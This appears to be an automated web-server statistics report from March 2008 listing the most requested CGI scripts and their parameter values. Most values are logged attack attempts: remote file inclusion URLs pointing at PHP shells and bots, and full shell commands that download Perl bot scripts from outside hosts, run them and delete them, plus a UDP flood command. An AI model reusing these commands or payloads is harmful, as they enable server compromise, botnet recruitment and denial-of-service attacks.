Month of 3/1/2008 to 3/31/2008: Top 100 CGI Scripts

Top 10 Parameters with Top 10 values

ScriptTotal Accesses
/wusage/summary/cgi.html//skin/zero_vote/error.php 1,301
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
7
id 4
cd /tmp;curl -O http://www.crcmodels.com.br/oneadmin/_arquiv
os/INDvv1.txt;lwp-download http://www.crcmodels.com.br/onead
min/_arquivos/INDvv1.txt;wget http://www.crcmodels.com.br/on
eadmin/_arquivos/INDvv1.txt;perl INDvv1.txt;rm -rf *txt*
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
2
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.jpg;l
wp-download http://www.auzr.kz/tender/files/INDzz2.jpg;wget
http://www.auzr.kz/tender/files/INDzz2.jpg;perl INDzz2.jpg;r
m -rf *IND*
2
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
2
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
2
cd /tmp;rm -rf bot.txt*;wget http://www.freewebs.com/haddem/
bot.txt;lwp-download http://www.freewebs.com/haddem/bot.txt;
fetch http://www.freewebs.com/haddem/bot.txt;curl -o bot.txt
http://www.freewebs.com/haddem/bot.txt;GET http://www.freew
ebs.com/haddem/bot.txt >bot.txt;lynx -source http://www.free
webs.com/haddem/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt
*
1
cd /tmp;curl -O http://www.icpreview.com/cache/IND2.jpg;lwp-
download http://www.icpreview.com/cache/IND2.jpg;wget http:/
/www.icpreview.com/cache/IND2.jpg;perl IND2.jpg;rm -rf *IND*
1
Parameter dir
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 31
http://www.cosmick.kit.net/pbot.txt? 31
http://www.rayzorowns.kit.net/id.txt??? 30
http://203.71.212.3/www/modul/id.txt?? 29
http://madinaedu.gov.sa/id2.txt??? 29
http://www.capsoir.com/images/TRA.txt? 27
http://www.pucorp.t5.com.br/lp.txt? 27
http://www.freewebs.com/yahwek/phpbot.txt? 20
http://danthefarrier.co.uk/id/mic22.txt? 18
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
18
Parameter error
ValueAccesses
http://www.codeduc.cl/documentos/id.txt?? 2
Parameter id
ValueAccesses
http://www.capecoral-golf.com/tsys/id.txt? 1
OTHER: 1,011
ScriptTotal Accesses
/wusage/summary/cgi.html//index.php 1,204
Parameters by Submitted Value
Parameter GLOBALS
ValueAccesses
6
Parameter Itemid50
ValueAccesses
1
Parameter Itemid
ValueAccesses
196
191//administrator/configuration.php?option=com_login 2
1 2
87//index.php?option=com_joomlaxplorer 1
149 1
87 1
Parameter _REQUEST
ValueAccesses
6
Parameter _REQUEST[Itemid]
ValueAccesses
1 6
Parameter _REQUEST[option]
ValueAccesses
com_phpshop 4
com_content 2
Parameter admin_path
ValueAccesses
http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? 3
Parameter autoLoadConfig[999][0][autoType]
ValueAccesses
include 9
http://normanzito.iespana.es/http.txt?? 2
http://www.perphilrh.com.br/perphilrh/muie.txt? 1
http://www.answergraphics.com/file_upload/modules/public/con
fig/tester.txt?
1
http://humano.ya.com/maverickx123/x123.txt? 1
http://www.corsemusique.com/portail/agenda/config/tester.txt
?
1
http://freewebs.com/diegoxfelix/ch.txt? 1
Parameter autoLoadConfig[999][0][loadFile]
ValueAccesses
http://www.eq2arena.com/content/data1/alba.txt?? 2
http://xdengue01.iespana.es/bds/all.txt? 2
http://www.visitecuador.travel/downloads/jancok.txt?? 1
http://www.schuleniederwil.ch/images/echo.txt? 1
http://www.tovr.com/images/id.gif? 1
hhttp://claroline.lct-net.cl/id? 1
http://xdengue01.iespana.es/bds/altobot01.txt?? 1
Parameter body
ValueAccesses
http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?
?
5
http://www.liautism.com/components/terror.txt?? 2
http://riyands.qupis.com/bot/r57.txt?? 1
http://www.geocities.com/freach_gon/bot.txt? 1
http://antihackerlink.or.id/c99.txt? 1
http://geocities.com/brian_cool_2007/simple.txt? 1
OTHER: 937
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_galleria/galleria.ht
ml.php
1,036
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
8
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
5
id 4
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
2
cd /tmp;rm -rf bot.txt*;wget http://www.freewebs.com/haddem/
bot.txt;lwp-download http://www.freewebs.com/haddem/bot.txt;
fetch http://www.freewebs.com/haddem/bot.txt;curl -o bot.txt
http://www.freewebs.com/haddem/bot.txt;GET http://www.freew
ebs.com/haddem/bot.txt >bot.txt;lynx -source http://www.free
webs.com/haddem/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt
*
1
wget http://www.packs.by.ru/udp.txt;perl udp.txt imperioot.s
ervegame.com 7171 300
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
idhttp://www.freewebs.com/finish007/raw.txt???? 1
cd /var/tmp;id 1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 64
http://www.freewebs.com/yahwek/phpbot.txt? 27
http://www.freewebs.com/haddem/phpbot.txt 22
http://mtvktv.no-ip.org/php.txt? 20
http://204.11.228.115/id.txt? 20
http://bsthank.t35.com/spread.txt? 18
http://www.pucorp.t5.com.br/lp.txt? 18
http://www.freewebs.com/haddem/botnetphp.txt 18
http://www.capsoir.com/images/TRA.txt? 16
http://www.freewebs.com/yahwek/xisde.txt.txt? 14
Parameter mosconfig_absolute_path
ValueAccesses
2
OTHER: 771
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_rsgallery/rsgallery.
html.php
941
Parameters by Submitted Value
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
4
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
2
id 2
cd /tmp;GET http://www.sprula.kit.net/bruxom4l.txt > bruxom4
l.txt;perl bruxom4l.txt abcase
1
cd /tmp;GET http://sprula.kit.net/bot.txt > bot.txt;perl bot
.txt;rm bot.txt
1
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
1
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.jpg;l
wp-download http://www.auzr.kz/tender/files/INDzz2.jpg;wget
http://www.auzr.kz/tender/files/INDzz2.jpg;perl INDzz2.jpg;r
m -rf *IND*
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
cd /tmp;curl -O http://www.icpreview.com/cache/IND2.jpg;lwp-
download http://www.icpreview.com/cache/IND2.jpg;wget http:/
/www.icpreview.com/cache/IND2.jpg;perl IND2.jpg;rm -rf *IND*
1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.cosmick.kit.net/pbot.txt? 23
http://www.freewebs.com/yahwek/sete.txt? 23
http://204.11.228.115/id.txt? 22
http://www.pucorp.t5.com.br/lp.txt? 22
http://www.freewebs.com/yahwek/phpbot.txt? 20
http://ownzera.googlepages.com/readme.txt? 19
http://www.arthog.co.uk/login/pi.txt? 16
http://xsenharox.xpg.com.br/suvbni? 14
http://www.freewebs.com/sethz/php.txt? 12
http://yahwek.fileave.com/xana.txt? 12
Parameter mosconfig_absolute_path
ValueAccesses
2
OTHER: 742
ScriptTotal Accesses
/wusage/summary/cgi.html//modules/xfsection/modify.php 834
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.jpg;l
wp-download http://www.auzr.kz/tender/files/INDzz2.jpg;wget
http://www.auzr.kz/tender/files/INDzz2.jpg;perl INDzz2.jpg;r
m -rf *IND*
3
cd /tmp;curl -O http://www.crcmodels.com.br/oneadmin/_arquiv
os/INDvv1.txt;lwp-download http://www.crcmodels.com.br/onead
min/_arquivos/INDvv1.txt;wget http://www.crcmodels.com.br/on
eadmin/_arquivos/INDvv1.txt;perl INDvv1.txt;rm -rf *txt*
3
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
3
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.txt;l
wp-download http://www.auzr.kz/tender/files/INDzz2.txt;wget
http://www.auzr.kz/tender/files/INDzz2.txt;perl INDzz2.txt;r
m -rf *txt*
2
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDvv1.txt;l
wp-download http://www.auzr.kz/tender/files/INDvv1.txt;wget
http://www.auzr.kz/tender/files/INDvv1.txt;perl INDvv1.txt;r
m -rf *txt*
1
cd /tmp;curl -O http://www.icpreview.com/cache/IND2.jpg;lwp-
download http://www.icpreview.com/cache/IND2.jpg;wget http:/
/www.icpreview.com/cache/IND2.jpg;perl IND2.jpg;rm -rf *IND*
1
cd /tmp;rm bot1.txt;wget http://yugifire.t35.com/bot1.txt;fe
tch http://yugifire.t35.com/bot1.txt;lwp-download http://yug
ifire.t35.com/bot1.txt;curl -O http://yugifire.t35.com/bot1.
txt;lynx http://yugifire.t35.com/bot1.txt;perl bot1.txt
1
cd /tmp;curl -O http://homenet.ch/downloads/INDxx2.jpg;lwp-d
ownload http://homenet.ch/downloads/INDxx2.jpg;wget http://h
omenet.ch/downloads/INDxx2.jpg;perl INDxx2.jpg;rm -rf *IND*
1
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
1
cd /tmp;lwp-download http://www.miskolctapolca.hu/hirdetesek
/IND2.jpg;curl -O http://www.miskolctapolca.hu/hirdetesek/IN
D2.jpg;wget http://www.miskolctapolca.hu/hirdetesek/IND2.jpg
;perl IND2.jpg;rm -rf *IND*
1
Parameter dir_module
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 52
http://www.freewebs.com/yahwek/phpbot.txt? 22
http://mtvktv.no-ip.org/php.txt? 19
http://www.pucorp.t5.com.br/lp.txt? 17
http://204.11.228.115/id.txt? 16
http://www.capsoir.com/images/TRA.txt? 15
http://www.freewebs.com/sethz/php.txt? 14
http://www.freewebs.com/yahwek/xisde.txt.txt? 13
http://bsthank.t35.com/spread.txt? 12
http://www.capsoir.com/images/TRA.txt 11
OTHER: 626
ScriptTotal Accesses
/wusage/summary/cgi.html//include.php 802
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/RFIZAO.txt > RFIZAO.txt;perl RFIZAO.txt;rm RFIZAO.txt
4
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 56
http://www.freewebs.com/yahwek/phpbot.txt? 24
http://mtvktv.no-ip.org/php.txt? 18
http://www.freewebs.com/sethz/php.txt? 15
http://www.freewebs.com/yahwek/xisde.txt.txt? 14
http://www.pucorp.t5.com.br/lp.txt? 14
http://www.capsoir.com/images/TRA.txt? 12
http://lol123.fileave.com/script9.txt?? 12
http://www.capsoir.com/images/TRA.txt 11
http://bsthank.t35.com/spread.txt? 11
OTHER: 611
ScriptTotal Accesses
/wusage/summary/cgi.html/index.php 764
Parameters by Submitted Value
Parameter
ValueAccesses
connection:absolute_path=http://tckct.co.uk/public_htm/speed
.txt?
3
connection:absolute_path=http://usuarios.arnet.com.ar/adrikr
asnow/cvi.txt?
1
connection:absolute_path=http://usuarios.arnet.com.ar/adrikr
asnow/test.txt?
1
Parameter GLOBALS
ValueAccesses
16
Parameter Itemid
ValueAccesses
127
1 10
http://luminaldemon.altervista.org/img/cmd.txt??????????? 1
Parameter _REQUEST
ValueAccesses
16
http://normanzito.iespana.es/http.txt?? 8
http://freewebs.com/diegoxfelix/ch.txt?? 6
http://usuarios.arnet.com.ar/adrikrasnow/xx1.txt? 5
http://fxmsn.org/1.txt? 4
http://www.freewebs.com/w0rmrulz/pBot.txt???? 4
http://tckct.co.uk/public_htm/speed.txt? 3
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 2
http://tigerz.host.sk/cnew.txt? 2
http://cru5her.cr.funpic.de/b00tzb00tz.txt???? 2
Parameter _REQUEST[Itemid
ValueAccesses
1 2
Parameter _REQUEST[Itemid]
ValueAccesses
1 14
Parameter _REQUEST[option]
ValueAccesses
com_content 5
com_login 3
com_com_akobook 3
com_phpshop 2
com_akobook 2
com_zoom 1
Parameter autoLoadConfig[999][0][autoType]
ValueAccesses
include 5
Parameter autoLoadConfig[999][0][loadFile]
ValueAccesses
http://geocities.com/devayudistira/mic22.txt? 1
http://www.skyoffice.com.ar/includes/id.txt? 1
http://www.skyoffice.com.ar/includes/arab.txt? 1
http://www.3rdcoastcustoms.biz/1photos/readme.txt?? 1
http://www.negociool.net/webmail/.../arab.txt? 1
Parameter ba
ValueAccesses
CMD? 1
OTHER: 510
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_facileforms/facilef
orms.frame.php
724
Parameters by Submitted Value
Parameter
ValueAccesses
1
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
3
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
2
id 2
cd /tmp;GET http://sprula.kit.net/bot.txt > bot.txt;perl bot
.txt;rm bot.txt
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
Parameter ff_colendar/samplecalendar.php/oneadmin/adminfoot.php?path[d
ocroot]
ValueAccesses
http://www.freewebs.com/thelicor/php1.txt 1
Parameter ff_compath
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 51
http://www.freewebs.com/yahwek/phpbot.txt? 28
http://204.11.228.115/id.txt? 20
http://fxsoft.elementfx.com/scriptx.txt?? 20
http://www.freewebs.com/yahwek/xisde.txt.txt? 17
http://mtvktv.no-ip.org/php.txt? 15
http://lol123.fileave.com/script9.txt?? 12
http://www.pucorp.t5.com.br/lp.txt? 12
http://www.azarofundazioa.com/extranet/cursos/27/nivel2/reno
vacion.txt
11
http://yahwek.fileave.com/xana.txt? 11
Parameter mosConfig_absolute_path
ValueAccesses
http://www.ritterspektakel-leipzig.de/administrator/can? 1
OTHER: 515
ScriptTotal Accesses
/wusage/summary/cgi.html//modules/xgallery/upgrade_album.php
556
Parameters by Submitted Value
Parameter GALLERY_BASEDIR
ValueAccesses
http://yugifire.t35.com/tool25.txt? 20
http://www.stdr.xpg.com.br/priv8? 20
http://www.pucorp.t5.com.br/lp.txt? 19
http://www.freewebs.com/yahwek/sete.txt? 17
http://aszer.republika.pl/cos..txt? 17
http://www.g3nius.net/fuck.txt? 13
http://www.freewebs.com/sethz/php.txt? 12
http://lol123.fileave.com/script9.txt?? 12
http://www.freewebs.com/yahwek/xisde.txt.txt? 11
http://lol1234.fileave.com/script9.txt?? 10
Parameter cmd
ValueAccesses
cd /tmp;rm bot1.txt;wget http://yugifire.t35.com/bot1.txt;fe
tch http://yugifire.t35.com/bot1.txt;lwp-download http://yug
ifire.t35.com/bot1.txt;curl -O http://yugifire.t35.com/bot1.
txt;lynx http://yugifire.t35.com/bot1.txt;perl bot1.txt
17
cd /tmp;rm bot1.txt;wget http://www.freewebs.com/ecologycrew
/bot1.txt;fetch http://www.freewebs.com/ecologycrew/bot1.txt
;lwp-download http://www.freewebs.com/ecologycrew/bot1.txt;c
url -O http://www.freewebs.com/ecologycrew/bot1.txt;lynx htt
p://www.freewebs.com/ecologycrew/bot1.txt;perl bot1.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
cd /var/tmp;id 1
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
id 1
OTHER: 379
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/AllMyGuests/signin.php 520
Parameters by Submitted Value
Parameter _AMGconfig[cfg_serverpath]
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 35
http://www.freewebs.com/sethz/php.txt? 15
http://www.freewebs.com/yahwek/phpbot.txt? 13
http://www.indoirc.altervista.org/php5/id.txt??? 11
http://mtvktv.no-ip.org/php.txt? 9
http://ownzera.googlepages.com/readme.txt? 9
http://www.capsoir.com/images/TRA.txt 9
http://www.capsoir.com/images/TRA.txt? 8
http://www.freewebs.com/yahwek/xisde.txt.txt? 8
http://www.poker95.fr/prc.gif? 8
Parameter _AMGconfig[cfg_serverpats/tinycontent/admin/spaw/spaw_contro
l.class.php?spaw_root
ValueAccesses
http://www.freewebs.com/thelicor/php1.txt 1
Parameter _AMGconfigcfg_serverpath]
ValueAccesses
http://www.auzr.kz/tender/files/cmd.txt? 3
http://www.miskolctapolca.hu/hirdetesek/IND.jpg? 3
http://www.auzr.kz/tender/files/cmd.jpg? 3
http://www.crcmodels.com.br/oneadmin/_arquivos/cmd.txt? 2
http://homenet.ch/downloads/cmd.jpg? 2
http://www.icpreview.com/cache/cmd.jpg? 1
http://www.miskolctapolca.hu/hirdetesek/botIND.txt? 1
http://www.crcmodels.com.br/oneadmin/_arquivos/cmd.txt/cmd.t
xt?
1
Parameter cmd
ValueAccesses
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.jpg;l
wp-download http://www.auzr.kz/tender/files/INDzz2.jpg;wget
http://www.auzr.kz/tender/files/INDzz2.jpg;perl INDzz2.jpg;r
m -rf *IND*
6
cd /tmp;curl -O http://www.crcmodels.com.br/oneadmin/_arquiv
os/INDvv1.txt;lwp-download http://www.crcmodels.com.br/onead
min/_arquivos/INDvv1.txt;wget http://www.crcmodels.com.br/on
eadmin/_arquivos/INDvv1.txt;perl INDvv1.txt;rm -rf *txt*
6
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDzz2.txt;l
wp-download http://www.auzr.kz/tender/files/INDzz2.txt;wget
http://www.auzr.kz/tender/files/INDzz2.txt;perl INDzz2.txt;r
m -rf *txt*
4
cd /tmp;curl -O http://www.auzr.kz/tender/files/INDvv1.txt;l
wp-download http://www.auzr.kz/tender/files/INDvv1.txt;wget
http://www.auzr.kz/tender/files/INDvv1.txt;perl INDvv1.txt;r
m -rf *txt*
2
cd /tmp;curl -O http://homenet.ch/downloads/IND2.jpg;lwp-dow
nload http://homenet.ch/downloads/IND2.jpg;wget http://homen
et.ch/downloads/IND2.jpg;perl IND2.jpg;rm -rf *IND*
2
cd /tmp;curl -O http://www.icpreview.com/cache/IND2.jpg;lwp-
download http://www.icpreview.com/cache/IND2.jpg;wget http:/
/www.icpreview.com/cache/IND2.jpg;perl IND2.jpg;rm -rf *IND*
2
cd /tmp;curl -O http://homenet.ch/downloads/INDxx2.jpg;lwp-d
ownload http://homenet.ch/downloads/INDxx2.jpg;wget http://h
omenet.ch/downloads/INDxx2.jpg;perl INDxx2.jpg;rm -rf *IND*
2
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
2
id 1
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
OTHER: 350
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/xfsection/modify.php 517
Parameters by Submitted Value
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
5
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
3
id 2
Parameter dir_module
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 30
http://www.freewebs.com/sethz/php.txt? 16
http://www.freewebs.com/yahwek/phpbot.txt? 14
http://204.11.228.115/id.txt? 12
http://www.pucorp.t5.com.br/lp.txt? 12
http://www.capsoir.com/images/TRA.txt? 10
http://www3.bloglog.com.br/p.t? 10
http://jackzard.110mb.com/r57 10
http://mtvktv.no-ip.org/php.txt? 10
http://www.freewebs.com/yahwek/xisde.txt.txt? 10
Parameter dir_modulehttp://www.geocities.com/greencoolest/Eny.txt?
ValueAccesses
1
OTHER: 372
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_rsgallery/rsgallery
.html.php
487
Parameters by Submitted Value
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
2
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
id 1
cd /tmp;rm -rf bot.txt*;wget http://www.freewebs.com/haddem/
bot.txt;lwp-download http://www.freewebs.com/haddem/bot.txt;
fetch http://www.freewebs.com/haddem/bot.txt;curl -o bot.txt
http://www.freewebs.com/haddem/bot.txt;GET http://www.freew
ebs.com/haddem/bot.txt >bot.txt;lynx -source http://www.free
webs.com/haddem/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt
*
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.vwbr.com.br/ip1.txt;wget http://www.vwbr.com.br/ro
s1.txt;wget http://www.vwbr.com.br/scanasc.txt;curl -o ip1.t
xt http://www.vwbr.com.br/ip1.txt;curl -o ros1.txt http://ww
w.vwbr.com.br/ros1.txt;curl -o scanasc.txt http://www.vwbr.c
om.br/scanasc.txt;perl ip1.txt;perl ros1.txt;perl scanasc.tx
t
1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/yahwek/phpbot.txt? 14
http://www.pucorp.t5.com.br/lp.txt? 12
http://www.freewebs.com/sethz/php.txt? 11
http://204.11.228.115/id.txt? 10
http://www.capsoir.com/images/TRA.txt? 10
http://www.freewebs.com/yahwek/sete.txt? 10
http://xsenharox.xpg.com.br/suvbni? 9
http://www.freewebs.com/yahwek/xisde.txt.txt? 9
http://ilegals.ifrance.com/x!???? 8
http://www.txd.conexaostore.com/tester? 7
OTHER: 381
ScriptTotal Accesses
/wusage/summary/cgi.html//phplive/message_box.php 486
Parameters by Submitted Value
Parameter deptid
ValueAccesses
http://204.11.228.115/id.txt? 4
http://freewebtown.com/trabalho/CMD.txt? 3
http://zamanalwsl.net/banners/left/box.txt? 2
http://nartok.com/CMS/cache/cmds.txt? 2
http://xsenharox.xpg.com.br/suvbni? 2
http://scripts.crewhosting.com/t.txt?? 1
